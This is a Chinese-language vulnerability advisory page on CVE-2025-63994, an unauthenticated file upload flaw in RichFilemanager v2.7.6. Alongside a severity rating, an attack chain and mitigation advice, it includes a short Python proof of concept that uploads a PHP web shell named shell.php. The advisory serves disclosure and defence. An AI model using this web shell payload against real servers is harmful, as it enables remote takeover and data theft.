CVE-2025-63994 CVSS 9.8 严重

CVE-2025-63994: RichFilemanager v2.7.6 任意文件上传漏洞

披露日期: 2025-11-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-63994

漏洞类型

任意文件上传/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

RichFilemanager v2.7.6

漏洞概述

CVE-2025-63994是RichFilemanager v2.7.6版本中的一个严重安全漏洞，存在于/php/UploadHandler.php组件中。该漏洞允许未经身份验证的远程攻击者通过上传恶意构造的文件来执行任意代码。由于CVSS评分达到9.8，属于严重级别，影响网络可达性且无需特殊权限即可利用。攻击者可以利用此漏洞完全控制受影响的系统，窃取敏感数据或部署恶意软件。

技术细节

该漏洞源于RichFilemanager的文件上传功能缺乏充分的输入验证和文件类型检查。攻击者可以上传包含恶意代码的文件（如PHP脚本），然后通过直接访问该文件来执行任意代码。漏洞利用涉及绕过文件类型限制和文件名验证机制。

攻击链分析

STEP 1

攻击者识别目标系统上运行的RichFilemanager版本

STEP 2

构造恶意PHP文件并上传到服务器

STEP 3

访问上传的文件以执行任意代码

STEP 4

完全控制受影响的系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests

target = 'http://target.com/richfilemanager/php/UploadHandler.php'
payload = '<?php system($_GET["cmd"]); ?>'
files = {'file': ('shell.php', payload, 'application/x-php')}
response = requests.post(target, files=files)
print(response.text)

影响范围

RichFilemanager v2.7.6

防御指南

临时缓解措施

立即升级RichFilemanager到最新版本，并实施文件上传安全检查

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63994
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63994
3 Details https://www.cvedetails.com/cve/CVE-2025-63994/
4 VulDB https://vuldb.com/cve/CVE-2025-63994
5 Link https://github.com/psolom/RichFilemanager/issues/412

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表